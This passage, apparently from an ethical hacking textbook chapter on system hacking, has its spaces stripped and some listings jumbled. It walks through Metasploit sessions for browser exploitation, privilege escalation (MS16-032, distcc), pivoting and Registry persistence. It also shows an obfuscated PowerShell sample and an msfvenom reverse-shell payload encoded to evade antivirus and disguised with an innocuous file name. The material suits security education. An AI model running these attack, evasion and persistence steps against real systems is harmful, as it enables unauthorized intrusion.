createsalistener,expectedtohandlethereturnconnectionfromthetargetsystem.Thereturnconnectioncomesfromthepayloadthatisdeliveredtothetargetwhentheymaketheconnection,ifthevulnerabilityisexploited.ThismeansthatyouneedtogettheURLtoyourtarget.Thereareseveralwaystodothat,includingsendingemailwiththeURLobscured,sinceaURLthatincludeselementslike:8080andthenarandomstringmaybesuspicious.Thisisnottosaythatyouneedtousetherandomstringortheunusualport.Youcouldalsocreatealinkinawebpagethatyouexpectyourtargetstoregularlyvisit.TheURLcouldbeloadedautomaticallybyplacingitinapageelementlikeanIMGtag.AbrowserencounteringthattagwillissueaGETrequesttotheURLprovided.LivingOffthe Land 291OnceyougetyourvictimtovisittheURL,theirbrowsermakesarequestthatgetshandledbyMetasploit.Themoduleshouldsendtheexploitcodetothebrowser.Iftheexploitissuccessful,itshouldfireaconnectionbacktothehandlerthattheexploitstartedup.Whatyou’llgetbackfromthatconnectionisashellonthesystem.SincetheexploitisagainstamacOS(OSX)systemandmacOSusesaUnix-­likeoperatingsystemanduserland,whatyou’llgetbackisaBashshellwhereyoucansendcommands.Thisparticularexploitdoesn’tsupportaMeterpreterpayload.Gainingaccesstothesystemisonlypartofwhatanattackerwoulddo,soit’sonlypartofwhatyouwouldbedoingasanethicalhacker.Gainingaccessisonlyastart.LivingOffthe LandSofar,we’vebeenlookingatusingtoolsthatyouwouldneedtogetontoaremotesystem.Acommonapproachofattackerstoday,aswellasanyoneinthesecuritytestingbusiness,issomethingcalledlivingofftheland.Thismeansmakinguseoftoolsthatarealreadyavailableonthetargetsystem.Fortunately,whenitcomestoWindowssystems,wegetalotofhelp.Microsofthasbeenprovidinganincreasinglypowerfulprogramminglanguage,PowerShell,withWindowsinstallations.Whileitmayhavebeenlimitedwhenitwasfirstintroducedin2006,itwasacontinuationofattemptsbyMicrosofttoenhancescriptingcapabilitiesonWindowssystems.Afterall,Unix-­likeoperatingsystemssuchasLinuxhavehadscriptinglanguagesbuiltinfromthebeginning.ThenativeinterfaceonUnixandLinuxsystemshasalwaysbeenacommand-­lineinterfacethatisthescriptinglanguageinterpreter,calledashell.Inrecentyears,MicrosofthasopenedupPowerShelltomoreplatformsthanjustWindows.YoucangetPowerShellforbothLinuxandmacOS.ThisisslightlydifferentfromthePowerShellthatcomesbuiltintomostWindowsinstallations.YoucaninstallthesameversionofPowerShellonWindowsastheversion,currentlymajorversion7,availablefortheotheroperatingenvironments,butit’snotcurrentlyinstalledbydefaultwithWindows10,forinstance.PowerShellisanobject-­orientedprogramminglanguagethatusesfeaturescalledcmdletstoprovidefunctionality.Ratherthanjusthavingastraightforwardlanguageandsyntax,PowerShellisbuilttobeextended.Youcancertainlyusethecorelanguagefeaturestowriteprograms,butyoucanalsowritethesecmdletsorusetheonesbuiltintothelanguagetogetaccesstocomplexfunctionalityfortasks.InadditiontoPowerShellbeingapowerfulprogramminglanguageinitself,therearesomeexploitationframeworksthataredevelopedinPowerShell.Theyarecurrentlyinvariousstatesofmaintenance.Forinstance,Empireisapost-­exploitationframeworkwritteninPowerShell,meaningthisisasetoftoolsyouwoulduseafteryouhadalreadyexploitedasystem.Youmaygetaccesstotheabilitytoeasilyescalateprivilegesorcollectpasswords,forinstance.MuchlikeMetasploit,thisrequiresanagenttobeinstalledonthetargetsystemthatyoucommunicatewith.Empireappearstonolongerbesupported,thoughyoucanstillgrabthesourcecodeforit.292 Chapter7  SystemHacking■AnothertoolisPowerSploit.Thisisanothertoolthatisnolongeractivelymaintained,butyoucangrabitandmakeuseofit.Itprovidesanumberofcmdletsthatincludefunctionsforcodeexecution,persistence,exfiltration,privilegedescalation,reconnaissance,andothers.Again,whileit’snotactivelymaintained,youcangrabthecollectionofscriptsforuse.FuzzingAtechniquethatcanbeusedforbothfindingbugsinsoftwareandpotentiallycausingdenial-­of-­serviceattacksisfuzzing.Thisisawordusedasshorthandtodescribetheprocessofsendingunexpectedormalformeddataintoanapplicationtoseehowthatapplicationhandlesit.Iftheapplicationhandlesitnicely,nothingofinteresthappens.Youmaygetanerror,orthedatamaysimplybediscarded.Forourpurposes,that’snotveryinteresting.Iftheapplicationdoesn’thandleitnicely,theapplicationmaycrash.Thiswasoneofthosetechniquesthatwaspopularforaperiodoftime,thoughmayhavefallenoffalittle.Therewereoncealotofdifferentprojectsthatperformedfuzzing.Someofthosedon’texistanymore,ortheymaynolongerbemaintained.Someofthemhavebecomecommercialtools.Oneofthefirstfuzzerscameoutofanacademicproject.ItwascalledCodenomicon,anditwasusedtoidentifyseriousvulnerabilitiesinDNSandSNMP.Sincethen,thevalueofsendingmalformeddataintoanapplicationwasthoughttobeagoodwaytotestsoftwaremorerigorously.Thesedays,softwaredevelopmentteamsaredoingabetterjoboftestingtheseanomalies,whichmayexplainwhytherearen’tasmanyprojectsdoingit.Ontopofthat,fuzzingishardwork.It’snotassimpleasjustrunningaprogramthatgoesoffandfindsvulnerabilitiesandexploits.First,evenfindingavulnerabilityishard.Ifyoucanfindoneofthose,thereisnoguaranteeitwilltranslatetoanexploit.Let’ssayyouaregoingtorunafuzzeragainstanapplication.Iftheapplicationcrashes,whatdoyouknow?Youknowyoucrashedanapplication.Withoutalotofmonitoringandinstrumentation,youdon’tknowwhereintheapplicationitcrashed.Youmaynotevenknowverywellwhatmessagecausedthecrash.Theweirdthingaboutsoftwareisyoumaygetacumulativeeffect.Aseriesofmessagesmaycauseaproblemthatmayappearasthoughasinglemessagecausedthefailure.Narrowingdownthesetofmessagesishardwork.Havingsaidallthat,therearesometoolsavailablethatyoucanuseforfuzzing.ThereisanoldertoolcalledSulley,namedforthefuzzycharacterfromMonsters,Inc.(presumablybecauseMikedidn’thavethesamering),thatstoppedbeingdevelopedandthenwaspickedupagainandupdated.It’snowinastatethatmayrequirealittleworktogetfunctional,butyoucouldlookatit.TheonewewilllookathereiscalledPeach(getit?peach?fuzz?).Thisisatoolthatcanhandlebothnetworkaswellasfilefuzzing.Ittakescareoftheinstrumentationaspectbyallowingyoutostartupamonitordevice.PeachusesXMLasadefinitionlanguage.TowriteafuzzingtestinPeach,youhavetocreateanumberofelements.First,youneedtocreateadatamodel.Thisdefinesthedatathatwillbesentintotheapplication.Youmayhavemultipledatamodels.ThedatamodelstellPeachwhatpartswillbemanipulatedtosendbaddataintotheapplication.OnceyouFuzzing 293haveyourdatamodel(s)defined,youneedtocreateastatemodel.ThistellsPeachhowthedatamodelswillbeused.ThefollowingisasimpleexampleofcreatingadatamodelandassociatedstatemodelforPeachthatwillfuzzanHTTPrequest.Thesealonearenotsufficient.Youneedapublisher.ThistellsPeachhowit’sgoingtocommunicatewiththeapplication.Inthiscase,youwoulduseanetworkpublisher,andPeachincludessomepredefinedpublishersfornetworkcommunication.ThefollowingistheXMLthatdefinestheoveralltestforPeach,includingthepublisher.Italsodefinesalogger,sowehaveevidenceofwhathappened.Watchingtheoutputonthescreencanbechallengingsinceyoumaygetalotofoutputandit’shardtofollow.Whatyoucanseecommentedoutinthisistheremoteagent,whichisusedtomonitortheapplication.Inthiscase,we’dmonitortheHTTPserverforcrashes.ThisletsPeachknowhowtocommunicatewiththeremotemonitoringapplicationsoitcansyncupwhatitsentwithwhathappenedontheremoteserver.-­-­>294 Chapter7  SystemHacking■Asnoted,yougetalotofoutput.Peachwilldeterminehowmanytestsitrunsbasedonthedatamodelsdefined.ThefollowingisasetofoutputfromPeachrunningthetestdefinedearlier:PSC:\Users\RicMessier\Downloads\peach>.\peach.exe.\samples\http.xml[[Peachv3.1.124.0[[Copyright(c)MichaelEddington[*]Test'Default'startingwithrandomseed43275.[R1,-­,-­]Performingiteration[1,-­,-­]Performingiteration[*]Fuzzing:HttpRequest.DataElement_1[*]Mutator:UnicodeBomMutator[*]Fuzzing:HttpRequest.DataElement_0[*]Mutator:DataElementRemoveMutator[*]Fuzzing:HttpRequest.DataElement_2[*]Mutator:UnicodeBomMutator[*]Fuzzing:HttpRequest.DataElement_4[*]Mutator:UnicodeBadUtf8Mutator[*]Fuzzing:HttpRequest.DataElement_3[*]Mutator:UnicodeBomMutator[2,-­,-­]Performingiteration[*]Fuzzing:HttpRequest.DataElement_1[*]Mutator:UnicodeBadUtf8Mutator[*]Fuzzing:HttpRequest.DataElement_3[*]Mutator:UnicodeUtf8ThreeCharMutator[3,-­,-­]Performingiteration[*]Fuzzing:HttpRequest.DataElement_1[*]Mutator:UnicodeUtf8ThreeCharMutator[*]Fuzzing:HttpRequest.DataElement_3[*]Mutator:StringMutator[*]Fuzzing:HttpRequest.DataElement_4[*]Mutator:UnicodeBadUtf8Mutator[*]Fuzzing:HttpRequest.DataElement_0[*]Mutator:StringMutator[*]Fuzzing:HttpRequest.DataElement_2[*]Mutator:UnicodeUtf8ThreeCharMutatorPostExploitation 295Thisisnottheonlytypeoffuzzing,though.Localvulnerabilitiesmaynotworkonnetworkservices.Instead,theymayrequirefilestotrigger.Peachwillworkwithfile-­basedfuzzingaswell.Inthiscase,youwouldneedasamplefilethatcouldbeusedtomanipulateasneededtotriggeracrash.Peachwouldrepeatedlyopenthefilewithaltereddata.Themonitoringrequiredforthiswouldoccuronthesamesystemwherethetestingwasbeingexecuted,whichisnotnecessarilythesamefornetwork-­basedtesting.PostExploitationYounowhaveafootholdonthesystem.Whatyoucandowithitdependsonwhatyoucompromised.Youmayhavelimitedpermissionsiftheremoteserviceyoucompromisedhaslimitedpermissions.Youcanonlyperformtasksthatyouhavepermissionstoperform.Thismeansyoumayneedtoescalateyourprivilegestoauserwithmorethanyouhave.Gainingrootoradministratorpermissionsisacommonobjectiveforattackerssinceithelpsthempivottoothersystemstomovelaterallywithintheenvironment.Youmayalsohaveabetterchancetocollectpasswordsandothercriticalsysteminformationthatyoumayneedforothertasks.Younotonlyhaveafootholdonthesystem,butthatsystemgivesyouafootholdonthenetworkaswell.Youmayfind,especiallyifyouhavecompromisedasystemofferingservicestotheoutsideworld,thatthesystemisconnectedtomorethanonenetwork.Thismeansyoucanusethecompromisedsystemasagatewaytothoseothernetworks.Thisisatechniquecalledpivoting,whereyoupivotoffthecompromisedsystemtotakealookatanothersetofsystems.Thiswillgetyoufurtherintothenetworkandpotentiallygainyouevenmoresensitiveinformationoraccesstomorecriticalsystems.Attackerswillalsolooktogainpersistentaccesstothesystem.Thismaymeananumberofactivities,fromcreatinguserstoinstallingbackdoors.Alongsidepersistentaccess,theattackerwillwanttocovertheirtracks.Thiscanmeanhidingdatainplacesonthesystem.Itmaymeanmanipulatinglogs.Itcanalsomeanmanipulatingsystembinariestohelphideyourexistence.EvasionOnceyouhaveafoothold,whichmayincludeusernamesandpasswordsoractualremoteaccesstoasystem,youmayrunintoproblems.Bothworkstationsandserverswillprobablyhaveatleastanti-­malwareifnotsoftwarethatwilllookforanomalousbehavior.Endpointdetectionandresponse(EDR)softwarewillknowwhatattacktechniqueslooklike.Commontools,suchasthosediscussedinthischapter,maybewell-­knowntothesesortsoftools.Thiscallsforevasivetactics.Therearetwopotentialplaceswherethisevasionneedstotakeplace.Thefirstisdetectingfiles,primarilyondisk.Youmaybeabletousetechniqueslikealternatedatastreamsmentionedlater.Youcanalsoencryptorotherwiseobfuscatedata.Encryptedzipfilesareonewaytogetarounddetectioninanti-­malwaresoftware.296 Chapter7  SystemHacking■Whenitcomestoexecution,though,wehaveanotherproblem.Anti-­malwaresoftwaremayhavewaysofdetectingexecutables.YoumaybeabletogetaroundthisbyusingPowerShelltoperformthesametask.TheremaynotbeadetectioninplaceforaPowerShellscript,especiallyifyouwriteyourown,andyoumaybeabletoaccomplishthesametaskthatanativeexecutableisdoingforyou.OneoftheproblemswithPowerShellisitmaybelogged.Thiscanmakedetectionafterthefacteasier,butnotifthePowerShellcan’tberead.Asanexample,thefollowingisasampleofPowerShellthathasbeenobfuscated:$N7=[char[]]"noisserpxE-­ekovnI|)93]rahC[,'pQm'ecalpeR-­43]rahC[,'bg0'ecalpeR-­)')pQm'+'nepQ'+'m+pQme'+'rGpQm'+'('+'roloCdnu'+'orger'+'oF-­)bg0nbg0'+'+bg0oibg0'+'+bg0tacbg0'+'+'+'bg0sufbO-­b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+bg0Ib'+'g'+'0'+'()'+'bg'+'0tsO'+'bg0'+'+bg'+'0H'+'-­'+'ebg0'+''+'+b'+'g0'+'tIRwb'+'g0(.'((";[Array]::Reverse($N7);IEX($N7-­Join'')ThistranslatestoInvoke-­Obfuscation,whichisacmdletwrittenbyDanielBohannonthattakesaPowerShellscriptandobfuscatesit.Therearedifferentwaystoaccomplishtheobfuscation,asdemonstratedwhenyourunthecmdletwithoutanyparameters.ThefollowingarethetechniquesyoucanuseforobfuscatingPowerShellusingthiscmdlet:Chooseoneofthebelowoptions:[*][*][*][*][*][*]TOKENASTSTRINGENCODINGCOMPRESSLAUNCHERObfuscatePowerShellcommandTokensObfuscatePowerShellAstnodes(PS3.0+)ObfuscateentirecommandasaStringObfuscateentirecommandviaEncodingConvertentirecommandtoone-­linerandCompressObfuscatecommandargsw/Launchertechniques(runonceatend)Thereareseveralotherwaystoobfuscatescriptsanddata.ThismayincludetechniqueslikeencodingpayloadsthathavebeengeneratedbyatoollikeMetasploit.Ultimately,yourobjectiveistogetaccesstoasystem,whichmayincludegettingfilesontoasystemwithoutdetectionor,probablymorelikely,executingprogramsonatargetsystem.PrivilegeEscalationYourmission,shouldyouchoosetoacceptit,istogainroot-­levelaccess.TherewasatimewhenservicesranasrootonUnix/LinuxsystemsorasLocalSystemonWindowssystems,whichisanaccountthathasahighlevelofpermissions.Onceyouhaveroot-­levelaccess,youshouldbeabletogainaccesstoallinformationonthesystemaswellasmakechangestoservicesandmanipulateusers.Whatthismeansisthatyouneedtogetaccesstothesystemfirst,andthenyou’llneedtorunanotherexploittogetelevatedprivileges.WecancontinuetouseMetasploitforthis,solet’sstartwithacompromisedsystemwithaMeterpretershell.Ifwebackgroundtheshellusingthebackground,wecanmakeuseoftheopensessionasawayofinteractingwiththesystem.PostExploitation 297Weneedtoidentifyalocalexploit.OnewayofdoingthisistousethePythonscriptwindows-­exploit-­suggester.py.ThisisascriptthatcanbedownloadedfromGitHub.ItrequiresacoupleofthingstorunbeyondaPythoninterpreter.Firstistheoutputfromsysteminfo.SecondisthedatabasecontainingtheMicrosoftsecuritybulletins(MSSB)information.Togetthefirst,we’llpullitfromourexploitedWindowssystem.WecandroptoaWindowsshellfromMeterpreterandrunsysteminfo,redirectingtheoutputtoafile,andthenwecanpullthatfilebacktoourlocalsystem.Youcanseethatprocessinthefollowinglisting.GettingSystemPatchInformationmeterpreter>shellProcess3created.Channel3created.MicrosoftWindows[Version6.1.7601]Copyright(c)2009MicrosoftCorporation.Allrightsreserved.C:\ProgramFiles\elasticsearch-­1.1.1>systeminfo>patches.txtsysteminfo>patches.txtC:\ProgramFiles\elasticsearch-­1.1.1>exitexitmeterpreter>downloadpatches.txt[*]Downloading:patches.txt-­>patches.txt[*]Downloaded2.21KiBof2.21KiB(100.0%):patches.txt-­>patches.txt[*]download:patches.txt-­>patches.txtOncewehavethepatchinformation,wecanmoveontousingwindows-­exploit-­suggester.We’regoingtogetanupdatedMSSBdatabase,andthenwe’llrunthescriptwithourtwofiles,lookingforlocalexploits.Youcanseerunningthescriptinthenextcodelisting.Whatwewillgetisalistoflocalexploitsthatcouldpotentiallyberunagainstourcompromisedsystem.Itdoesn’tprovideanydetailsaboutMetasploitmodules,whichmeanswe’llstillneedtodosomesearchingforthat.However,itdoesprovideresourcesifyouwanttolearnmoreaboutthevulnerabilitiesandtheexploit.GettingLocalExploitSuggestions[email protected]:~#[*]initiating[+]writingto[*]done[email protected]:~#mssb.xls-­l./windows-­exploit-­suggester.py-­-­updatewinsploitversion3.3...file2021-­01-­09-­mssb.xls./windows-­exploit-­suggester.py-­ipatches.txt-­d2021-­01-­09-­298 Chapter7  SystemHacking■[*]initiatingwinsploitversion3.3...[*]databasefiledetectedasxlsorxlsxbasedonextension[*]attemptingtoreadfromthesysteminfoinputfile[+]systeminfoinputfilereadsuccessfully(ascii)[*]queryingdatabasefileforpotentialvulnerabilities[*]comparingthe2hotfix(es)againstthe407potentialbulletins(s)withadatabaseof137knownexploits[*]therearenow407remainingvulns[*]searchingforlocalexploitsonly[+][E]exploitdbPoC,[M]Metasploitmodule,[*]missingbulletin[+]windowsversionidentifiedas'Windows2008R2SP164-­bit'[*][M]MS16-­075:SecurityUpdateforWindowsSMBServer(3164038)-­Important[*]https://github.com/foxglovesec/RottenPotato[*]https://github.com/Kevin-­Robertson/Tater[*]https://bugs.chromium.org/p/project-­zero/issues/detail?id=222-­-­Windows:LocalWebDAVNTLMReflectionElevationofPrivilege-­-­-­snip-­-­-­[E]MS14-­026:Vulnerabilityin.NETFrameworkCouldAllowElevationofPrivilege(2958732)-­Important[*]http://www.exploit-­db.com/exploits/35280/,-­-­.NETRemotingServicesRemoteCommandExecution,PoC[*][*]doneSomeofthesuggestedexploitswon’trunagainstWindowsonWindows(WoW)64.Thisisasubsystemthatallows32-­bitWindowsexecutablestoexecuteon64-­bitWindowsinstallations.Theexploitwouldneedtheabilitytorunwithinthissubsystemandstillbeabletoexploitthevulnerability.Asthereisanadditionallayerofsoftwareon64-­bitWindows,someexploitsjustwon’twork.We’regoingtousetheMS16-­032vulnerability.WeneedtoidentifytheMetasploitmoduleassociatedwiththatvulnerability,whichmeanswecanjustsearchfortheMicrosoftvulnerability,asyoucanseeinthefollowingcodelisting.Searchingforthevulnerabilityreturnsasinglemodule.Searchingfor LocalExploitsfexploit(windows/local/ms15_051_client_copy_image)>searchmMS16-­032MatchingModules================PostExploitation NameDisclosureDateRankDescription-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­exploit/windows/local/ms16_032_secondary_logon_handle_privescnormalMS16-­032SecondaryLogonHandlePrivilegeEscalation2992016-­03-­21xploit(windows/local/ms15_051_client_copy_image)>useeexploit/windows/local/ms16_032_secondary_logon_handle_privescKeepinmindthatatthispoint,wehaveasessionopentoourtargetsystem.Tousethelocalexploit,weneedtosetthesessionnumberwehaveopen.Ifyouneedtoknowwhichsessionnumbertousebecauseyou’velosttrack,youcanjustusethesessionscommandonceyou’vebackgroundedtheMeterpretersessionyouwerein.Thisisaparameteryouwillneedtoset,aswellassettingthepayloadandthelocalhostandportrequiredforthereverseMeterpretershell.Youcanseesettingallthenecessaryvariablesandthenstartinguptheexploit.UsingLocalExploitfrom Metasploitsfexploit(windows/local/ms16_032_secondary_logon_handle_privesc)msetSESSION2SESSION=>2msfexploit(windows/local/ms16_032_secondary_logon_handle_privesc)192.168.86.57LHOST=>192.168.86.57msfexploit(windows/local/ms16_032_secondary_logon_handle_privesc)4445LPORT=>4445msfexploit(windows/local/ms16_032_secondary_logon_handle_privesc)>>setLHOST>setLPORT>exploit[*]StartedreverseTCPhandleron192.168.86.57:4445[!]Executing32-­bitpayloadon64-­bitARCH,usingSYSWOW64powershell[*]Writingpayloadfile,C:\ManageEngine\DesktopCentral_Server\bin\ROayyKQ.txt...[*]Compressingscriptcontents...[+]Compressedsize:3621[*]Executingexploitscript...Insomecases,wecan’tmakeuseofMetasploit.Weneedtomakeuseofsomeexternaltools.Thismaymeancompilinganexploitprogram.Inthenextcodelisting,youwillseecompromisingaLinuxsystemusingavulnerabilityonadistributedCcompilerdaemon.300 Chapter7  SystemHacking■ThismakesuseofaMetasploitmoduletoperformtheinitialexploit.TheprivilegeescalationrequiresaCprogramtobecompiledsoitrunsonthetargetsystem.Sincewecan’tguaranteethereisaCcompiler,theprogramiscompiledontheattacksystem.Ourtargetis32-­bit,whileourattacksystemis64-­bit.Thismeansweneedtohaveaspecialsetoflibrariessowecancross-­compilefromonetargetarchitecturetoanother.Oncewehavetheoutput,though,wecanputitandasimpleshellscriptintothedirectory,whereitwillbeavailablefromawebserver.Inthislisting,youwillseeexploitingthetargetsystemandthenrunningtheprivilegeescalation.LinuxPrivilegeEscalationmsf>useexploit/unix/misc/distcc_execmsfexploit(unix/misc/distcc_exec)>setRHOST192.168.86.66RHOST=>192.168.86.66msfexploit(unix/misc/distcc_exec)>exploit[*]StartedreverseTCPdoublehandleron192.168.86.57:4444[*]Acceptedthefirstclientconnection...[*]Acceptedthesecondclientconnection...[*]Command:echo9LVs5a2CaAEk29pj;[*]WritingtosocketA[*]WritingtosocketB[*]Readingfromsockets...[*]ReadingfromsocketB[*]B:"9LVs5a2CaAEk29pj\r\n"[*]Matching...[*]Aisinput...[*]Commandshellsession1opened(192.168.86.57:4444-­>192.168.86.66:47936)at2021-­01-­0918:28:22-­0600whoamidaemoncd/tmppsauxww|grepudevroot26630.00.1-­-­daemondaemon63640.00.1grepudev./escalate26622216700?SgetuidServerusername:NTAUTHORITY\LOCALSERVICEmeterpreter>ipconfig302 Chapter7  SystemHacking■Interface1============NameHardwareMACMTUIPv4IPv4NetmaskIPv6AddressIPv6Netmask:SoftwareLoopbackInterface1:00:00:00:00:00:00:4294967295Address:127.0.0.1:255.0.0.0:::1:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffffInterface12============NameHardwareMACMTUIPv6AddressIPv6Netmask:::::MicrosoftISATAPAdapter00:00:00:00:00:001280fe80::5efe:c0a8:5621ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffffInterface13============NameHardwareMACMTUIPv4AddressIPv4NetmaskIPv6AddressIPv6Netmask:::::::Intel(R)PRO/1000MTNetworkConnection1e:25:07:dc:7c:6e1500192.168.86.33255.255.255.0fe80::35b1:1874:3712:8b59ffff:ffff:ffff:ffff::Interface19============NameHardwareMACMTUIPv4AddressIPv4NetmaskIPv6AddressIPv6Netmask:::::::Intel(R)PRO/1000MTNetworkConnection#242:39:bd:ec:24:401500172.30.42.50255.255.255.0fe80::4b4:7b9a:b3b7:3742ffff:ffff:ffff:ffff::PostExploitation 303Toaddtherouteweneedtopasstraffictothe172.30.42.0subnet,weneedtorunapost-­exploitmodule.Themodulewearegoingtoruniscalledautoroute,anditwilltakecareofaddingtheroutetothatnetworkbywayofthesessionwehaveopen.Inthefollowinglisting,youcanseerunningtheautoroutemodule.You’llseetheoutputindicatingthattheroutehasbeenaddedasaresultofrunningthemodule.RunningAutorouteeterpreter>runpost/multi/manage/autoroutemSUBNET=172.30.42.0ACTION=ADD[!][*][*][+]SESSIONmaynotbecompatiblewiththismodule.RunningmoduleagainstVAGRANT-­2008R2Addingarouteto172.30.42.0/255.255.255.0...Routeaddedtosubnet172.30.42.0/255.255.255.0.Nowthattherouteisinplace,wewanttomakeuseofit.WecanbackgroundtheMeterpretersessionatthispointandrunanymodulewechooseagainstthatnetwork.Forexample,itwouldn’tbeunusualtorunaportscanagainstthatnetwork.Inthefollowingcode,youcanseetheroutingtablebeingcheckedfromoutsideofMeterpreterafterthesessionisbackgrounded(youcanputMeterpreterintothebackgroundbyeitherusingthebackgroundcommandorpressingCtrl+Z).Theroutingtableshowsthatwehavearoutetothe172.30.42.0 networkthroughSession1,whichistheMeterpretersessionwehaveopen.Belowthat,theportscanmodulegetsloadeduptorunagainstthatnetwork.msfexploit(windows/http/manageengine_connectionid_write)>routeprintIPv4ActiveRoutingTable=========================Subnet-­-­-­-­-­-­172.30.42.0Netmask-­-­-­-­­-­-­255.255.255.0Gateway-­-­-­-­-­-­-­Session1[*]TherearecurrentlynoIPv6routesdefined.msfexploit(windows/http/manageengine_connectionid_write)>sfexploit(windows/http/manageengine_connectionid_write)>useauxiliary/mscanner/portscan/tcpmsfauxiliary(scanner/portscan/tcp)>setRHOSTS172.30.42.0/24RHOSTS=>172.30.42.0/24msfauxiliary(scanner/portscan/tcp)>run304 Chapter7  SystemHacking■Onceyouhaveanideaofwhatothersystemsareontheothernetwork,youcanstartlookingforvulnerabilitiesonthosesystems.Pivotingisallabouttakingonecompromisedsystemandusingittogainaccesstoothersystems,thatis,pivottothosesystems.Onceyouhaveyournetworkroutesinplace,youareingoodshapetoaccomplishthatpivotingsoyoucanextendyourreachintothenetwork.PersistenceGainingaccessisimportantbecauseitdemonstratesthatyoucancompromisesystemsandgainaccesstosensitiveinformation.Thisisagoodwaytoshowtheorganizationyouareworkingwithwheresomeoftheirissuesmaybe.However,attackersdon’twanttohavetokeepexploitingthesamevulnerabilityeachtimetheywantaccesstothesystem.Forastart,it’stime-­consuming.Second,iftheattacker,evenifit’safaux-­attacker(meaningyou),isexploitingavulnerability,theycan’tbesurethatthevulnerabilitywon’tbepatched.Thismeanstheymaynotbeabletogetinlater.Gatheringinformationprobablyisn’taone-­and-­donesituation.Ofcourse,inanenterpriseenvironment,dataisconstantlychanging.Nomatterwhattheobjectiveoftheattackeris,theywillgenerallywanttomaintainaccesstocompromisedsystems.Theprocessofmaintainingaccessiscalledpersistence.Accesstothesystemispersistingovertimeand,ideally,acrossrebootsofthesystem.Nomatterwhathappens,ideally,theattackercanstillgetintothesystemwhentheywant.Thereareseveraltechniquesforthis.Ifasystemhasremoteaccess,suchasSecureShell(SSH)orremotedesktoponWindowssystems,theattackermayjustcreateanewuserthathastheabilitytologinremotely.Ifthecompromiseduserchangestheirpasswordortheuseraccountisremoved,thenewuserwillbeavailablefortheattacker.Anotheroptionistoinstallsoftwarethatwillreachouttotheattacker’ssystem.Thisisoftenthebestapproach,becausefirewallsareprobablyinplacethatwillblockinboundconnectionattempts,butoutboundconnectionsaregenerallyallowed.So,wecaninstallareverseshellpackage,anditwillconnectouttooursystemifwehaveahandlerwaitingtolisten.Inthefollowinglisting,youcanseestartingfromaMeterpretersessionandinstallingaprogramtostartupwhenauserlogsin.ThisparticularpersistencemechanismusestheRegistrytostorethepayload.ARunkeyunderHKEY_CURRENT_USERintheRegistrythengetsloadedtocallthepayload.RegistryPersistencefrom Metasploitmeterpreter>getuidServerusername:NTAUTHORITY\LOCALSERVICEmeterpreter>background[*]Backgroundingsession1...msfexploit(windows/http/manageengine_connectionid_write)>useexploit/windows/local/registry_persistencemsfexploit(windows/local/registry_persistence)>setSESSION1SESSION=>1msfexploit(windows/local/registry_persistence)>exploitPostExploitation [*][+][*][*][+][+][*]305Generatingpayloadblob..Generatedpayload,5968bytesRootpathisHKCUInstallingpayloadblob..CreatedregistrykeyHKCU\Software\hO2pqzThInstalledpayloadblobtoHKCU\Software\hO2pqzTh\kASCvdW3InstallingrunkeyThisprocessusestheRegistrytostoreanexecutableblobwithnocontroloverwhatgetsstoredthereandexecuted.YoucanalsocreateyourownexecutablethatyoucanalsousetheRegistrytechniquefor.Youjustwon’tbeabletousethemoduleshownabove.Tocreateyourownstand-­aloneexecutable,youcouldusethemsfvenomprogram,whichispartofMetasploit.Inthefollowingcodelisting,youcanseeanexampleofarunofmsfvenom.Thistakesthepayloadwindows/meterpreter/reverse_tcp,whichsendsbackaconnectiontoaMeterpretershelltothespecifiedIPaddress.UsingmsfvenomtoCreateStand-­AlonePayload[email protected]:~#msfvenom-­pwindows/meterpreter/reverse_tcpLHOST=192.168.86.57LPORT=3445-­fexe-­ex86/shikata_ga_nai-­ax86-­i3-­oelfbowling.exe[-­]Noplatformwasselected,choosingMsf::Module::Platform::WindowsfromthepayloadFound1compatibleencodersAttemptingtoencodepayloadwith3iterationsofx86/shikata_ga_naix86/shikata_ga_naisucceededwithsize368(iteration=0)x86/shikata_ga_naisucceededwithsize395(iteration=1)x86/shikata_ga_naisucceededwithsize422(iteration=2)x86/shikata_ga_naichosenwithfinalsize422Payloadsize:422bytesFinalsizeofexefile:73802bytesSavedas:elfbowling.exe[email protected]:~#ls-­laelfbowling.exe-­rw-­r-­-­r-­-­1rootroot73802Sep1217:58elfbowling.exeMuchofwhatyouseeinthecommand-­lineparametersisfairlystraightforward.We’recreatingan.exefileforanx8632-­bitWindowssystem.Thepayloadwillmakeaconnectionto192.168.86.57onport3445.TomakeuseofMeterpreteronthetargetsystem,youwouldneedtostartahandler.Asacallbacktoacoupleofsillygamesfromacoupleofdecadesago,I’vecalleditelfbowling.exe.Perhapsanyoneseeingitwouldn’tthinkmuchofit.Inadditiontobundlingthepayloadintoan.exefileinaproperportableexecutableformat,the.exeisalsoencoded.Thereasonforencodingistohideitfromantivirusprograms.Thereareotherwaystocreateapersistentconnection.AnotheristouseMetsvc.ThisistheMeterpreterservice.Itcreatesalistener,bydefaultonport31337,thatcanbeconnected306 Chapter7  SystemHacking■toinordertogetaMeterpretershell.YouwillnoticethatMetasploitmentionsthatMeterpreterscriptsaredeprecated.Instead,weshouldloadmodulesandusethem.However,forthemoment,theMeterpreterservicedoesworkandcanbeusedtogainaccess,aslongasyoucanconnecttothespecifiedportthroughwhateverfirewallsmaybeinplace.Creatingthe MeterpreterServiceon Targetmeterpreter>runmetsvc!]Meterpreterscriptsaredeprecated.Trypost/windows/manage/persistence_[exe.[!]Example:runpost/windows/manage/persistence_exeOPTION=value[...][*]Creatingameterpreterserviceonport31337[*]CreatingatemporaryinstallationdirectoryC:\Windows\SERVIC~2\LOCALS~1\AppData\Local\Temp\KrUjwJQb...[*]>>Uploadingmetsrv.x86.dll...[*]>>Uploadingmetsvc-­server.exe...[*]>>Uploadingmetsvc.exe...[*]Startingtheservice...Asnoted,theMeterpreterserviceexpectsthatyoucanconnectinbound.Also,theMeterpreterservicescriptisdeprecatedandmaysoonberemovedfromMetasploit.Instead,wecanmakeuseofthemodulethatMetasploitpointsusto.Inthenextcodelisting,youwillseetheuseofthatmodule.Itrequiresthatyouhaveanexecutabletouploadandinstallonthetargetsystem.Whatisprovidedhereistheoutputofthepayloadcreationpreviously.ThiswasthereverseMeterpreterexecutablecreatedfrommsfvenom.YouwillseethatMeterpreteruploadsthepayloadtothetargetsystemandcreatesapersistenceexecutable.TheRegistryentriesarethencreatedtoautomaticallyrunthepersistenceexecutablewhentheuserlogsin.YoucanseethisfromthereferencetoHKCU,